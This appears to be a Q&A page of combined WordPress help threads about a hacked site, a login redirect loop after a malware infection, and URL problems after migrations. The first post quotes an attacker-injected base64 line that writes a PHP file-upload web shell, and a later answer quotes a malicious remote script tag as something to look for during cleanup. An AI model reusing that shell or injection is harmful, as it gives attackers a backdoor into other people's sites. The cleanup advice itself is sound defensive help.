I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.
This results in two problems - first the DB access details in wp-config are changed to something don't work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.
After being overwritten, my wp-config file is full of lines like this:
file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));
My wp-config file has so many of these lines that it is about 800Kb in size.
The plugins I am using on my WordPress site are as follows:
Akismet Anti-Spam [v4.0.1 by Automattic]
Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
Duplicator [v1.2.3 by Snap Creek]
Google Analytics for WordPress [v7.7.1 by MonsterInsights]
Hello Dolly [v1.6 by Matt Mullenweg]
Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
Logo Slider [v1.4.7 by EnigmaWeb]
Recent Posts Widget Extended [v0.9.9.7 by Satrya]
Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
WordPress Importer [v0.6.3 by wordpressdotorg]
Yoast SEO [v5.9.1 by Team Yoast]
Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.
How do I stop these files from being over written?
Or how I can discover what is responsible for changing these files?
Looks like your system was compromised / hacked.
Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.
Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)
Related
am having issues with my wordpress website. I can't login in at all. When I try to goto wp-admin I get a 404 page not found error and it redirects to wp-login.php (wp-login.php?redirect_to=https%3A%2F%2Fmycrazywebsite.com%2Fwp-admin%2F&reauth=1)
When I goto just wp-login.php I get an error saying redirected you too many times.
I have tried the following:
Clearing my cookies - Did not work
I checked my siteurl and home in wp-options in my database - Both are correct.
Added the following code to wp-config.php:
define('WP_HOME' , 'https://mycrazywebsite.com'); define('WP_SITEURL' , 'https://mycrazywebsite.com');
Removed my .htaccess file
Added the following code to wp-config.php
if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) $_SERVER['HTTPS']='on';
None of them worked...Please help I have been struggling with this for days? Would it effect my site if I replace my wp-admin with a fresh one?
PLEASE NOTE:
this website was effected by the temp.lowerbeforwarden.ml virus that is going around.
I would say that it isn't an issue with your Apache configurations since it all started after your site was affected by a virus.
Create a copy of wp-config.php and download it.
Go to wp-includes directory and look for a file called
version.php. See the WordPress version that you have.
Visit https://wordpress.org/download/releases/ and download the zip
for that version.
Delete everything except wp-content directory.
Upload and extract.
Rename wp-config-sample.php to wp-config.php. Define the DB Credentials and Authentication keys (remember, you saved the old copy of wp-config.php! copy-paste details wherever needed but don't upload the old one unless you are absolutely sure that there's no malicious code in it)
Go to /wp-content/plugins directory and make a note of all the plugins installed. Delete all of them. Get all those plugins from WordPress repositories and upload the zip files and extract them.
Go to your phpMyAdmin and run this query (your table name may vary, it should be wp_posts or maybe in this format wpXX_posts, just check that):
select * from wpXX_posts where post_content like '%script%'
Review the data in post_content for each row and remove any malicious javascript code. (Copy data from that cell, paste in a text editor, review, delete everything from that cell and put back the reviewed data)
Examples (similar things to look for):
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script type='text/javascript'>window.location.href = "SOME_URL";</script>
Also, look for any Google Analytics or tracking scripts that you didn't add.
Go to wp-contents > themes and delete all theme folders. Upload
your theme's zip file and extract and put there.
Everything should be working by now. One last step, log in to your
WordPress dashboard, go to settings > permalinks and scroll down
and click 'save changes'.
This error could occur when there is no storage space left on device where MySQL store data.
Wordpress is unable to save session data in database and redirects to login page with &reauth=1.
Try this below steps:
Turn on debugging log in wp-config.php file.
Disable plugins one by one by rename plugin folder and check site working or not in /wp-content/plugins/ path.
Rename .htaccess, wp-config.php file & upload new .htaccess, wp-config file from freshly downloaded wordpress & update your db name, db user & db password in wp-config.php file.
Mostly virus affected websites injected with some anonymous files. So check any unknowing files available in public_folder.
Repair all your database tables in phpmyadmin by this syntax: "repair table "
You can try this
Try to debugging by disabling the plugins. It could be problem because of version mismatch.
Change old wp-config with new wp-config.
For virus attacking just check any anomalie files. it can only effect in root folder.
I've migrated many Wordpress sites before, but now I'm having an issue I just can't seem to solve. Some, but not all of the links are not loading properly.
I'm migrating from local.dev to example.com/test.
In my database options, I have both options set to example.com/test.
I doubled checked the options in the WP backend, and they're example.com/test.
I've updated my permalinks.
All of the pages work, all of the links work, but a few references to images, etc do not - they're loading example.com/ instead of example.com/test.
I think it might have to do with the .htaccess file, because I can't update it from the FTP side. If I delete it and update permalinks, no .htaccess file is created. I don't have access to any server side overrides, only the files.
In my MAMP vhosts, I have SymLinks Override set to All, but I can't edit anything like that on the live host.
The links that aren't working are along the lines of $image = get_post_meta(37 ,'_my_meta',TRUE)['img']; which should return
http://www.example.com/test/wp-content/uploads/image.jpg
but instead returns
http://www.example.com/wp-content/uploads/image.jpg.
Using bloginfo('wpurl'); returns http://www.example.com/test, and all similar ones return properly (site_url();, 'template_directory', etc.
In the end, the site is going to go on http://www.example.com without the subdirectory anyway, but I'm sure I have to get it to work properly to prevent future errors.
I also updated to the newest version of Wordpress at some point, not sure if that could cause any issues.
I believe the issue deals with media and links placed in content items.
I use to do some manual SQL queries to fix this but now I run this plug-in https://wordpress.org/plugins/automatic-domain-changer/
The plug-in will go through all the content and make the needed changes.
The links that aren't working are along the lines of $image => get_post_meta(37 ,'_my_meta',TRUE)['img']; which should return
http://www.example.com/test/wp-content/uploads/image.jpg
this meta information is stored in the DB. then to make the migration you have to change all the old URL in the DB before to import it in the new place
I hope you can help me.
For some unknown reason, every time I log into the admin and update the site, afterwards the "siteurl" and "home" paths are always changed to a previously used "testsubdomain". I already hired a developer who gave up telling me that he isn't a Wordpress specialist and can't see where the issue is.
What I have done until now, I just went into the phpmyadmin every time I noticed that it happened again, and changed the entries back to its correct path manually. This has become a real pain because every time this happens, the contact form entries aren't forwarded to the client either, and he is losing potential business.
Can anyone help and point me into a direction of how to fix this?
The site is http://www.chinatownband.com.
Thank you in advance!
Check to see if the URLs are hardcoded in either wp-config.php or the active theme functions.php file. Those are locations that read the URL settings for WordPress and can be used to fix or hardcode the URLs because they will override the URL settings in the database (see http://codex.wordpress.org/Changing_The_Site_URL ).
You're looking for
define('WP_HOME','http://testsubdomain.com');
define('WP_SITEURL','http://testsubdomain.com');
If you find those, delete them and then change to http://www.chinatownband.com in the database with phpmyadmin as you have been doing.
If those settings are not in wp-config.php or the active theme functions.php file, download the whole theme and use a text editor to search the folder for those define lines.
And look in the root web directory for any non-core WordPress files and folders and check them, too.
In the end, you may also need to use https://github.com/interconnectit/Search-Replace-DB to safely find/replace URLs in the database. The URLs you are changing are only the 2 settings URLs and don't retroactively change any URLs in page/post content that are links to media, other pages, etc.
I'm trying to move wp site from localhost on my work computer to my personal computer. I have followed these steps:
Copy wp-content folder
Export database
Import database
Paste wp-content folder
Configure config.php
It had copied all the themes and plugins, but content (images, text, pages etc) doesn't display. Did I skipped something?
You shouldn't transfer the wp-content folder as a whole, wordpress won't like it and wont find any of the posts/images within it.
If you transfer over just the theme and plugins first so all the files are in place and then do the import of the database you may have more luck.
The only problem will be the images, which may go missing due to the fact that they cannot be downloaded via localhost. Sadly the only way i can think of fixing that is through going through each page and re-adding them.
If the URL was changed:
http://codex.wordpress.org/Moving_WordPress
I would recommend to check wp_config table in the database for the following entries:
option_name=’siteurl‘ or option_name=’home‘
and check if the values are correct for the new installation.
I was in the middle of migrating a local WP site to a live server and came across a problem.
I edited my WP config file and uploaded it along with the rest of the WP files. I also uploaded the mysql database through phpMyAdmin.
Once i tried to test the site i got an error message "The page isn't redirecting properly". I then, mistakenly, logged in to the admin area and in the Settings > General tab I deleted the localhost part of the URL. Now I'm unable to log back in to the WP admin area.
EDIT
To clarify, my major problem is that i can no longer log in to the wp admin area because of something I've done. The steps i took to get to this point were:
Backed up WP using the BackUpWordpress plugin
Edited back up wp-config file with define('WP_HOME','http://example.com'); define('WP_SITEURL','http://example.com');
Created mySQL database through DreamHost
Changed database info in wp-config file
Uploaded wp files (not including mySQL backup) to my url using Filezilla
Imported mySQL database backup to DreamHost
I then checked the site from my browser, an error message said too many redirects occurred
From the wp admin area i went to Settings > General and deleted the localhost part of the url that was displayed.
I believe it's due to the previous step I'm now unable to access the wp admin area at all.
I need a way of getting back into the admin area
You can also edit those options within phpMyAdmin. Go to wp_options and locate siteurl and home. Make sure the URL matches your site URL.
You can also edit the site URL in your wp-config.php.
Add these lines somewhere above the /* That's all, stop editing! Happy blogging. */ line.
define('WP_HOME','http://my-site.com');
define('WP_SITEURL','http://my-site.com');
This should overwrite your database settings.
I believe the problem is that studiomed.co.uk is permanently redirected (301) to www.studiomed.co.uk and www.studiomed.co.uk is permanently redirected (301) to studiomed.co.uk
Login to your Dreamhost account go to Domains->Manage Domains and choose one of the three options there are in "Do you want the www in your URL?".
After that use an ftp program to download the .htaccess file that exists in your root installation of wordpress and open it with your favorite editor. Check if you have any kind of redirection in the .htaccess file.
Which version of WordPress do you use?
Can you list the plugins you are using?
Have you gone through the basic WordPress troubleshooting steps?
flush any caching plugins you might be running, as well as server
and/or browser caches.
deactivate all plugins to see if this resolves the problem. If this
works, re-activate the plugins one by one until you find the
problematic plugin(s). Sometimes, an apparently inactive plugin can
still cause problems.
If you can't get into your admin dashboard,
try resetting the plugins folder by FTP or PhpMyAdmin (read
http://codex.wordpress.org/FAQ_Troubleshooting#How_to_deactivate_all_plugins_when_not_able_to_access_the_administrative_menus.3F
if you need help).
switch to the Twenty Eleven theme (depends on your WordPress version) to rule out any theme-specific problems.
If you can't log in to change themes, you can remove the theme folders via FTP so the only one is twentyeleven. That will force your site to use it.
manual upgrade. When all else fails, download a fresh copy of the latest.zip file to your computer, and use that to copy up. You may need to delete the wp-admin and wp-includes folders on your server. Read the Manual Update directions first: http://codex.wordpress.org/Updating_WordPress#Manual_Update
check the Master List to see if you're experiencing a known issue
Login to your wordpress dashboard (wp-admin) and go to Settings->Permalinks, select Default and save changes.
Update all urls(path) using this querys then check:--
Use this querys for change all urls(path) for db then check
UPDATE wp_options SET option_value = replace(option_value, 'http://live_ste_path.com', 'http://localhost/local_site_path') WHERE option_name = 'home' OR option_name = 'siteurl';
UPDATE wp_posts SET post_content = replace(post_content, 'http://live_ste_path.com', 'http://localhost/local_site_path');
UPDATE wp_postmeta SET meta_value = replace(meta_value,'http://live_ste_path.com','http://localhost/local_site_path')`
[WSOD RESOLVED]
Since I could not find any solution to my problem by googling around, a crucial tracking info I finally found in WP error logs. So I would recommend to inspect logs before spending to much time looking for a proper answer by google.
After migration from an old web host to a new one, in my multisite environment all sites were working. Also, I was able to administer all subsites - but one! Trying wp-admin login to that site led me to fatal white screen. Without any message or any indication about the reason. And the culprit was corrupted file /public_html/subsite-x/wp-admin/admin.php. I really could not understand how that happened, just might suppose it appeared somehow while transferring files (FTP) from old host to a new one.